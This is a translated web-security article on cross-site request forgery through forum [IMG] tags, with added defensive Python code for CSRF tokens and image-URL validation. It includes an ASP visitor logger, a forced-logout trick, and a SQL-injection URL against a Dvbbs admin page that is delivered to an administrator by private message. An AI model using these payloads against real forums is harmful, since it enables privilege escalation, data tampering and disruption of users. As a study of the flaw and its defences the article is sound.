HTML tags pose a security risk: a test (network security)

Source: Internet
Author: User
Tags: html tags
The WWW service is one of the most important services on the Internet, offering users a huge range of information resources, and the thing that organizes those resources is HTML, the hypertext markup language. Later developments such as UBB tags are ultimately still rendered as HTML code. Research has found that even the most carefully written code (which has already ruled out the usual XSS vulnerabilities) cannot avoid another annoying attack vector, and less rigorous programs can be exploited through it to create an even greater threat.

Let me use the [IMG] tag, which the forum, article and blog systems found everywhere convert into HTML, as the example for explaining this neglected security issue. First I will describe how my own program handles this tag and how the browser handles it. Look at the following UBB code:
[Img]yun_qi_img/loveshell.jpg[/img] is converted by the script into <IMG src=yun_qi_img/loveshell.jpg>. This tag embeds a picture in the current page; forum programs now offer this feature both in posts and in personal avatars. When the browser encounters this HTML tag it looks up the network resource at the address given in SRC, here yun_qi_img/loveshell.jpg; when it finds the resource it requests and downloads it, parses it locally and displays the picture, and if the resource is not found it displays a red cross to indicate an error. Here yun_qi_img/loveshell.jpg is a perfectly normal picture, so everything goes smoothly. But have you ever wondered what happens if this resource is some other type, such as a web page, an EXE file or an ASP page, rather than an image file?

The answer is obvious: the picture shows a red X, our EXE file is not downloaded and the HTML page is not executed. That is only natural, because IE and other browsers parse whatever they fetch as an image, so a non-image produces an error and the red X. Nothing interesting so far. But what if we change the image address to a form like Http://127.0.0.1:88/imgtest/test.asp?user=shell, where test.asp has the following contents?

<%
Dim Fso, File                                         ' define the FSO object and the file handle
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Set Fso = Server.CreateObject("Scripting.FileSystemObject")
Path = Server.MapPath("Imgtest.txt")                  ' open Imgtest.txt in the same directory
Set File = Fso.OpenTextFile(Path, ForAppending, True)
File.Write "Someone Came:"                            ' write a marker
File.Write Request.ServerVariables("Query_string")    ' and the query string the browser sent
File.Write vbCrLf
File.Close
Set File = Nothing
Set Fso = Nothing
%>

If we test it we will see that our visit has been recorded, and even the parameters we submitted were received, yet the browser user knows nothing of this, because all they see is a red X. Now you may see what we can do with this! The important thing is that we can silently make a viewer visit a page, and even pass a GET parameter along with the request; keep that in mind, because below we will let our imagination run with it!

1. Brushing traffic. On a high-traffic forum we can set our own image to the page whose traffic we want to brush; then every visitor will visit our page. Whether or not he looked at it, he has visited it, hasn't he?

2. Destruction. This is the really annoying one: on a Dvbbs forum, if you set your image to logout.asp, hehe, everyone who views your post gets kicked out, very cool! Oh, and as for the Phantom forum, we can try it too, but this is very immoral!

3. Hacking. This is the most interesting one for us, because we can do things beyond our privileges: many programs defend the front end quite well these days, but the back end is not so tight. If the program obtains its data with Request("id"), we can use the tag to submit data to the CGI script. Note that it must not be Request.Form("username2"), which strictly specifies where the variable comes from, because our variables can only be submitted through the URL, i.e. the Query_string way mentioned above. Such non-rigorous programs are very lethal. For example, messages.asp in the SQL version of the Dvbbs forum obtains its data with Request; the code is as follows:

......
Sub Del()
Dim Dnum
If Request("username") = "" Then
BODY = body + "<br>" + "Please enter the user name to be deleted in bulk."
Exit Sub
End If
SQL = "Select COUNT(*) from dv_message where Sender = '" & Request("username") & "'"
Set Rs = Dvbbs.execute(SQL)
......

This was supposed to be a back-end page that requires admin privileges to access, but we construct a URL like this:

Http://bbs.dvbbs.net/admin/messages.asp?action=del&user= '; update/**/dv_user/**/set/**/useremail= (select/** /top/**/1/**/[username]/**/from/**/dv_admin)/**/where[username]= ' Loveshell ';--

Or a similar statement, and put it in the [IMG] tag. We may feel it is not very likely that the administrator will view our post, but remember that the forum's private messages support the same [img] tag as posts do, so if we can send the administrator a message containing our constructed IMG tag, the moment he opens that message it is done, oh! Combine it with a bit of social engineering and you kill without drawing blood, hehe! A small pity is that Dvbbs seems to convert & and some other symbols; we can try to break through that, and besides, plenty of programs out there are written even less rigorously.
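Added example, not part of the original article or of Dvbbs: a Python stand-in for the messages.asp handler that shows the difference between reading a field Request-style (query string or body) and Request.Form-style (body only), plus the POST-only and per-session token checks that keep an <img src> GET from ever reaching the deletion. The Req class, the token layout and the function names are my own assumptions.

```python
import hmac
import secrets
from urllib.parse import parse_qs

class Req:
    """Constructed stand-in for a forum request (method, query string, form body, session)."""
    def __init__(self, method, query="", form="", session=None):
        self.method = method
        self.query = parse_qs(query)
        self.form = parse_qs(form)
        self.session = session if session is not None else {}

    def request(self, name):
        # Like classic ASP Request(name): query string first, then form body.
        return (self.query.get(name) or self.form.get(name) or [""])[0]

    def form_field(self, name):
        # Like Request.Form(name): the POSTed body only.
        return (self.form.get(name) or [""])[0]

def issue_csrf_token(session):
    """Per-session secret that the forum renders into its own admin forms."""
    session["csrf"] = secrets.token_hex(16)
    return session["csrf"]

def del_loose(req):
    """Mirrors the messages.asp logic: any source, any method, so an <img src> GET succeeds."""
    user = req.request("username")
    if user == "":
        return "Please enter the user name to be deleted in bulk."
    return "deleted messages from " + user

def del_strict(req):
    """Hardened: body-only field, POST only, and a token the image-tag author cannot know."""
    if req.method != "POST":
        return "rejected: state-changing action must be POSTed"
    token = req.form_field("csrf")
    if not token or not hmac.compare_digest(token, req.session.get("csrf", "")):
        return "rejected: missing or wrong CSRF token"
    user = req.form_field("username")
    if user == "":
        return "Please enter the user name to be deleted in bulk."
    return "deleted messages from " + user
```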

4. Imagination. Everyone works so hard to make money; what if the address in the IMG tag is changed to an attachment download address, hehe, just saying, not tested.

5. ...

Finally, how to defend against this? If you want to keep the [IMG] tag but not the problem, you have to convert it, for example by requiring the suffix to be jpg; hehe, but that can be bypassed by appending #jpg to the URL. In general I think such restrictions can be gotten around, and even if you lock down IMG, well, there are still flash tags and rm tags... It is hard both to defend and to exploit.
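As an added example (not code from the original article), here is a small Python [img]-to-<img> converter: the naive version does the raw suffix check the article describes and is fooled by the #jpg trick, while the strict version parses the URL and judges only its path. The tag pattern, the allowed extensions and the function names are my own assumptions.

```python
import html
import re
from urllib.parse import urlsplit

# UBB [img]...[/img] pattern and the extensions we accept (assumptions for this example).
IMG_TAG = re.compile(r"\[img\](.+?)\[/img\]", re.IGNORECASE | re.DOTALL)
IMAGE_EXTENSIONS = (".jpg", ".jpeg", ".gif", ".png")

def naive_convert(text):
    """Suffix check on the raw string, as in the article: '...test.asp?user=x#.jpg' passes."""
    def repl(m):
        url = m.group(1).strip()
        if not url.lower().endswith(IMAGE_EXTENSIONS):
            return "[blocked image]"
        return '<img src="%s">' % url
    return IMG_TAG.sub(repl, text)

def is_safe_image_url(url):
    """Parse the URL and judge only its path; query and fragment can hide a script endpoint."""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() in ("http", "https"):
        if not parts.netloc:
            return False
    elif parts.scheme or parts.netloc:
        # javascript:, data:, file: ... and protocol-relative //host/x.jpg are all refused;
        # only plain site-relative paths fall through here.
        return False
    if parts.query or parts.fragment:
        return False
    return parts.path.lower().endswith(IMAGE_EXTENSIONS)

def strict_convert(text):
    """Same conversion, but every src must pass is_safe_image_url and is HTML-escaped."""
    def repl(m):
        url = m.group(1).strip()
        if not is_safe_image_url(url):
            return "[blocked image]"
        return '<img src="%s">' % html.escape(url, quote=True)
    return IMG_TAG.sub(repl, text)
```

Even the strict version only checks the shape of the URL; the server behind a .jpg path can still answer with a redirect or a script, so the stronger fix is to fetch and re-serve remote images through your own proxy that verifies the content type.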
